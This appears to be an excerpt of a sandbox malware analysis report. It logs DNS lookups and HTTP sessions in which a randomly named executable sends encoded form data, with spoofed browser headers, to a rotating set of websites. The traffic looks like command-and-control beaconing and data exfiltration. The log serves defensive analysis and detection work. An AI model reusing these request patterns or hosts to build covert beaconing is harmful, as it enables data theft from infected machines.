Jun 10, 2024 10:23:11.644712925 CEST | 1.1.1.1 | 192.168.2.5 | 0x55a7 | No error (0) | www.lecoinsa.net | | 217.116.0.191 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:23:25.907840967 CEST | 1.1.1.1 | 192.168.2.5 | 0x109e | No error (0) | www.zhuan-tou.com | | 103.120.80.111 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:23:39.843014956 CEST | 1.1.1.1 | 192.168.2.5 | 0xdb12 | No error (0) | www.kacotae.com | | 64.226.69.42 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:23:53.438527107 CEST | 1.1.1.1 | 192.168.2.5 | 0x1b69 | No error (0) | www.webuyfontana.com | | 3.64.163.50 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:24:07.402844906 CEST | 1.1.1.1 | 192.168.2.5 | 0x8eef | No error (0) | www.lunareafurniture.com | | 172.67.160.38 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:24:07.402844906 CEST | 1.1.1.1 | 192.168.2.5 | 0x8eef | No error (0) | www.lunareafurniture.com | | 104.21.14.186 | A (IP address) | IN (0x0001) | false
Jun 10, 2024 10:24:21.091758013 CEST | 1.1.1.1 | 192.168.2.5 | 0xecf7 | No error (0) | www.ffuel.network | | 193.149.176.221 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49717 | 101.36.121.143 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
Timestamp | Bytes transferred | Direction | Data
Jun 10, 2024 10:20:47.394016027 CEST | 457 | OUT | GET /9yv1/?kH=00U8ENLHk&TTv82Lg=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.am1-728585.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 10, 2024 10:20:48.354218960 CEST | 318 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:20:48 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 51367 | 85.13.162.190 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
Timestamp | Bytes transferred | Direction | Data
Jun 10, 2024 10:21:03.645113945 CEST | 723 | OUT | POST /jd4u/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.witoharmuth.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.witoharmuth.com
                                      Referer: http://www.witoharmuth.com/jd4u/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=ibUvaV9OfhRHv8pFzNhiE6oj/Uk9TtRUnErAYJAQm2C/o0GrTPqLeRu2F8F2WE8o0IURlkl99ZZ67Zmp2Fpo/kqXyrnm3KrV72R9jmvd7dNKY0TRXbM4xX4w4cTQHVZHB+TTJQzAq7LYrNn5EZNAEVSt3jkdzFdJBlcEXi2D1zIpKRijJBYwFJ7nfSEUDGCPRAu7Aks=
Jun 10, 2024 10:21:04.652988911 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:21:04 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 51368 | 85.13.162.190 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
Timestamp | Bytes transferred | Direction | Data
Jun 10, 2024 10:21:06.180073977 CEST | 743 | OUT | POST /jd4u/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.witoharmuth.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.witoharmuth.com
                                      Referer: http://www.witoharmuth.com/jd4u/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=ibUvaV9OfhRHud5F/K1iTKogjEk9IdRQnEnAYM4AlEm/oWOrSOqLfRu2dMFzbk9F0IZillJ99Zl67bup3ydr+0qVpbnkqarV72R9jmTn7e9KYljRQOw5tn4z9sTQDVYAB+TxJQDuq+HYrP/5DL1DOVTm5Dlz9wwTMDA+KBHSnA03PnPJTjQYWpXfPBMjS2jmLj+Lez7tmxFJBw7AVUK6SlWHbNPQ
Jun 10, 2024 10:21:07.142230034 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:21:06 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 51369 | 85.13.162.190 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
Timestamp | Bytes transferred | Direction | Data
Jun 10, 2024 10:21:08.710488081 CEST | 1760 | OUT | POST /jd4u/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.witoharmuth.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.witoharmuth.com
                                      Referer: http://www.witoharmuth.com/jd4u/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 69 62 55 76 61 56 39 4f 66 68 52 48 75 64 35 46 2f 4b 31 69 54 4b 6f 67 6a 45 6b 39 49 64 52 51 6e 45 6e 41 59 4d 34 41 6c 45 75 2f 6f 45 32 72 54 74 43 4c 59 52 75 32 55 73 46 79 62 6b 38 48 30 49 42 39 6c 6c 55 47 39 63 68 36 37 34 32 70 77 44 64 72 6e 45 71 56 32 72 6e 6e 33 4b 72 4d 37 32 68 35 6a 69 7a 6e 37 65 39 4b 59 6e 72 52 47 4c 4d 35 2b 33 34 77 34 63 54 58 48 56 59 6b 42 39 69 4d 4a 55 66 51 70 4b 37 59 72 76 76 35 46 34 4e 44 47 56 54 6b 36 44 6c 64 39 77 31 4e 4d 48 68 46 4b 41 79 46 6e 41 63 33 50 51 6a 55 50 77 31 45 49 34 48 68 50 52 46 43 51 6a 6a 67 53 6c 2b 33 64 43 48 63 6d 42 52 79 4c 6e 76 74 58 57 33 65 4f 51 61 30 62 74 36 78 42 54 50 6b 31 70 77 4d 4f 30 70 49 58 51 4d 49 53 74 58 64 65 6e 37 55 67 6a 4a 51 4d 2f 68 34 77 38 49 78 6f 4f 67 4d 4f 39 64 4b 2b 61 35 7a 68 44 45 70 4c 54 4b 76 67 69 6b 57 45 48 56 46 65 52 38 68 42 6a 2f 71 61 48 67 48 75 36 4a 4d 39 64 49 5a 57 68 68 75 54 42 43 72 46 39 2b 4e 77 76 54 45 51 32 58 34 50 65 52 54 74 31 [TRUNCATED]
                                      Jun 10, 2024 10:21:09.672548056 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:21:09 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      4 | 192.168.2.5 | 51370 | 85.13.162.190 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:11.241456985 CEST | 458 | OUT | GET /jd4u/?TTv82Lg=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.witoharmuth.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:21:12.155147076 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:21:11 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      5 | 192.168.2.5 | 51371 | 34.149.87.45 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:17.524070024 CEST | 741 | OUT | POST /fkxp/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.magnoliahairandco.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.magnoliahairandco.com
                                      Referer: http://www.magnoliahairandco.com/fkxp/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 79 2b 49 2b 7a 61 72 62 31 58 4c 45 75 59 63 59 70 39 31 76 47 6b 67 63 79 35 52 51 76 4f 61 79 33 49 52 62 7a 4b 77 4d 75 52 78 63 65 66 77 72 31 55 59 33 55 45 36 49 6a 4e 6b 79 51 45 43 33 6f 34 42 54 54 63 58 45 68 71 63 76 5a 6e 73 76 6c 70 6e 62 74 2f 7a 6e 69 37 53 63 62 46 5a 79 59 6b 46 59 72 6a 6a 6f 65 6d 62 65 6e 37 7a 69 4e 75 6f 56 36 55 34 65 33 49 47 4d 72 45 32 79 38 53 58 6c 39 64 6b 4f 4c 35 77 59 65 4f 4e 7a 69 54 47 52 6c 56 6d 41 30 65 4a 75 54 4c 74 69 2f 4b 69 45 4e 70 2f 34 34 69 6e 6d 56 77 61 73 4d 37 52 6f 72 75 6a 42 7a 56 4f 6b 2b 6c 48 73 64 43 54 72 36 2b 73 3d
                                      Data Ascii: TTv82Lg=y+I+zarb1XLEuYcYp91vGkgcy5RQvOay3IRbzKwMuRxcefwr1UY3UE6IjNkyQEC3o4BTTcXEhqcvZnsvlpnbt/zni7ScbFZyYkFYrjjoemben7ziNuoV6U4e3IGMrE2y8SXl9dkOL5wYeONziTGRlVmA0eJuTLti/KiENp/44inmVwasM7RorujBzVOk+lHsdCTr6+s=
                                      Jun 10, 2024 10:21:18.343774080 CEST | 674 | IN | HTTP/1.1 403 Forbidden
                                      Content-Length: 146
                                      Content-Type: text/html
                                      Server: Pepyaka
                                      X-Wix-Request-Id: 1718007678.23121635146216586
                                      X-Content-Type-Options: nosniff
                                      Accept-Ranges: bytes
                                      Date: Mon, 10 Jun 2024 08:21:18 GMT
                                      X-Served-By: cache-dfw-kdfw8210035-DFW
                                      X-Cache: MISS
                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpqA3Os764o0I4PRjoOFA1EG/hKs8AeY1T4OIbgnD+yx
                                      Via: 1.1 google
                                      glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      6 | 192.168.2.5 | 51372 | 34.149.87.45 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:20.059545040 CEST | 761 | OUT | POST /fkxp/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.magnoliahairandco.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.magnoliahairandco.com
                                      Referer: http://www.magnoliahairandco.com/fkxp/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 79 2b 49 2b 7a 61 72 62 31 58 4c 45 76 37 45 59 72 65 4e 76 41 45 67 66 38 5a 52 51 68 75 61 32 33 49 64 62 7a 4c 45 36 76 69 56 63 65 39 34 72 79 67 73 33 54 45 36 49 6f 74 6b 33 4e 30 43 34 6f 34 64 74 54 5a 2f 45 68 71 59 76 5a 69 49 76 6c 34 6e 55 73 76 7a 70 2b 37 53 53 44 6c 5a 79 59 6b 46 59 72 6e 4c 53 65 6d 44 65 6b 4c 44 69 66 64 77 57 79 30 34 5a 6e 34 47 4d 35 30 32 49 38 53 57 32 39 63 4a 6c 4c 36 45 59 65 4b 42 7a 68 43 47 53 72 6c 6d 61 77 65 49 43 57 37 6f 4f 32 36 75 45 53 50 2b 58 75 51 53 5a 64 6d 33 47 57 5a 5a 41 34 4f 50 35 6a 47 47 54 76 56 6d 46 48 68 44 62 6b 70 35 46 47 77 6f 38 65 59 43 73 56 79 76 54 4b 67 37 37 6b 74 45 48
                                      Data Ascii: TTv82Lg=y+I+zarb1XLEv7EYreNvAEgf8ZRQhua23IdbzLE6viVce94rygs3TE6Iotk3N0C4o4dtTZ/EhqYvZiIvl4nUsvzp+7SSDlZyYkFYrnLSemDekLDifdwWy04Zn4GM502I8SW29cJlL6EYeKBzhCGSrlmaweICW7oO26uESP+XuQSZdm3GWZZA4OP5jGGTvVmFHhDbkp5FGwo8eYCsVyvTKg77ktEH
                                      Jun 10, 2024 10:21:20.863603115 CEST | 674 | IN | HTTP/1.1 403 Forbidden
                                      Content-Length: 146
                                      Content-Type: text/html
                                      Server: Pepyaka
                                      X-Wix-Request-Id: 1718007680.75121635234316589
                                      X-Content-Type-Options: nosniff
                                      Accept-Ranges: bytes
                                      Date: Mon, 10 Jun 2024 08:21:20 GMT
                                      X-Served-By: cache-dfw-kdfw8210133-DFW
                                      X-Cache: MISS
                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpqA3Os764o0I4PRjoOFA1EG/hKs8AeY1T4OIbgnD+yx
                                      Via: 1.1 google
                                      glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      7 | 192.168.2.5 | 51373 | 34.149.87.45 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:22.602669001 CEST | 1778 | OUT | POST /fkxp/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.magnoliahairandco.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.magnoliahairandco.com
                                      Referer: http://www.magnoliahairandco.com/fkxp/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 79 2b 49 2b 7a 61 72 62 31 58 4c 45 76 37 45 59 72 65 4e 76 41 45 67 66 38 5a 52 51 68 75 61 32 33 49 64 62 7a 4c 45 36 76 69 64 63 65 49 73 72 31 78 73 33 53 45 36 49 32 64 6b 32 4e 30 43 6c 6f 34 46 70 54 5a 36 2f 68 6f 51 76 59 45 45 76 79 38 37 55 6c 76 7a 70 6d 37 53 54 62 46 5a 6e 59 6b 31 63 72 6a 76 53 65 6d 44 65 6b 4a 72 69 50 65 6f 57 30 30 34 65 33 49 47 51 72 45 33 47 38 53 2f 44 39 63 4e 54 4b 4d 30 59 64 75 74 7a 75 51 75 53 74 31 6d 63 33 65 49 61 57 36 55 52 32 36 79 79 53 50 69 75 75 54 43 5a 4d 53 36 61 45 36 73 63 67 73 6a 67 75 52 2b 6a 30 6c 6d 5a 47 77 33 36 68 2b 51 6a 4e 79 70 65 52 76 32 49 55 79 69 30 4f 6d 66 38 75 6f 70 4f 43 68 50 52 74 57 55 48 30 38 56 47 56 65 47 5a 65 2b 70 6a 33 58 30 62 63 64 32 36 35 54 73 64 70 41 70 36 4b 33 42 6a 77 36 78 6c 4c 65 61 34 71 32 41 70 6f 4f 6d 6f 42 46 37 59 71 43 2b 57 47 51 4f 64 75 56 73 68 62 78 45 6d 6d 76 54 77 65 52 52 38 34 73 61 5a 73 65 71 56 67 46 76 78 53 74 48 52 71 43 32 37 2f 74 2f 4d 39 52 [TRUNCATED]
                                      Jun 10, 2024 10:21:23.303809881 CEST | 675 | IN | HTTP/1.1 403 Forbidden
                                      Content-Length: 146
                                      Content-Type: text/html
                                      Server: Pepyaka
                                      X-Wix-Request-Id: 1718007683.192217429985716572
                                      X-Content-Type-Options: nosniff
                                      Accept-Ranges: bytes
                                      Date: Mon, 10 Jun 2024 08:21:23 GMT
                                      X-Served-By: cache-dfw-kdfw8210062-DFW
                                      X-Cache: MISS
                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkPYl3Dc4B5QnXwwDz84vBQG/hKs8AeY1T4OIbgnD+yx
                                      Via: 1.1 google
                                      glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                      Connection: close
                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      8 | 192.168.2.5 | 51374 | 34.149.87.45 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:25.134241104 CEST | 464 | OUT | GET /fkxp/?kH=00U8ENLHk&TTv82Lg=/8gewv/74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfHfL2d0FIn6Xu6R3bNDF3eABBlle0YrSl8ue4/yxd3ZPX0927FL0RhLHrtbCP+IL33YO17qClSrWnQ== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.magnoliahairandco.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:21:25.881891012 CEST | 1172 | IN | HTTP/1.1 301 Moved Permanently
                                      Content-Length: 0
                                      Location: https://www.magnoliahairandco.com/fkxp?kH=00U8ENLHk&TTv82Lg=%2F8gewv%2F74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfHfL2d0FIn6Xu6R3bNDF3eABBlle0YrSl8ue4%2Fyxd3ZPX0927FL0RhLHrtbCP+IL33YO17qClSrWnQ%3D%3D
                                      Strict-Transport-Security: max-age=86400
                                      X-Wix-Request-Id: 1718007685.7292175723712814102
                                      Age: 0
                                      Cache-Control: no-cache
                                      Server: Pepyaka
                                      X-Content-Type-Options: nosniff
                                      Accept-Ranges: bytes
                                      Date: Mon, 10 Jun 2024 08:21:25 GMT
                                      X-Served-By: cache-dfw-kdfw8210139-DFW
                                      X-Cache: MISS
                                      Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_uw2-pub-1_g
                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpLkXwApeozbAp9OYhJGBzcG/hKs8AeY1T4OIbgnD+yx,2d58ifebGbosy5xc+FRaljDG+XJYhrKse2gSLD9NqjXMk6vD/xY5wyq4cHt9fyljQtgW7xI86jgF1d+kiHWtEA==,2UNV7KOq4oGjA5+PKsX47MQSdi0AYTjuWOc8y48MAyZjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+EuO/EOFuU1yLyA423o/TtI=,GiE5c8Q213kn1NHwElo57O/WhgyJqwy8xztguXADRhESO5XmrrCSQNDehIjmfew32uZFBWWpaf/44hppUySdwQ==
                                      Via: 1.1 google
                                      glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      9 | 192.168.2.5 | 51375 | 116.213.43.190 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:31.255763054 CEST | 711 | OUT | POST /a472/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.binpvae.lol
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.binpvae.lol
                                      Referer: http://www.binpvae.lol/a472/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=uk1x/TEAJt0tsu9jLF9XWK8zgEuHCmILDRm/tWYLzM5BcXqZWcPU/P0PdYb260Fqi+ytOyndaKVk+gjHsGKhM8HYvIsz+s3JwwoJjzZBghczLtOxkQc5ZbEHYBIxt/lhxsEClS12zff32LMkf3+7L2jE3FAp+7ZYzASwDQH6Zfk5aS3lzvfjMOgiO3lDT0e38QT507E=
                                      Jun 10, 2024 10:21:32.212155104 CEST | 146 | IN | HTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Date: Mon, 10 Jun 2024 08:21:32 GMT
                                      Content-Length: 18
                                      Connection: close
                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                      Data Ascii: 404 page not found


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      10 | 192.168.2.5 | 51376 | 116.213.43.190 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:33.789751053 CEST | 731 | OUT | POST /a472/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.binpvae.lol
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.binpvae.lol
                                      Referer: http://www.binpvae.lol/a472/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
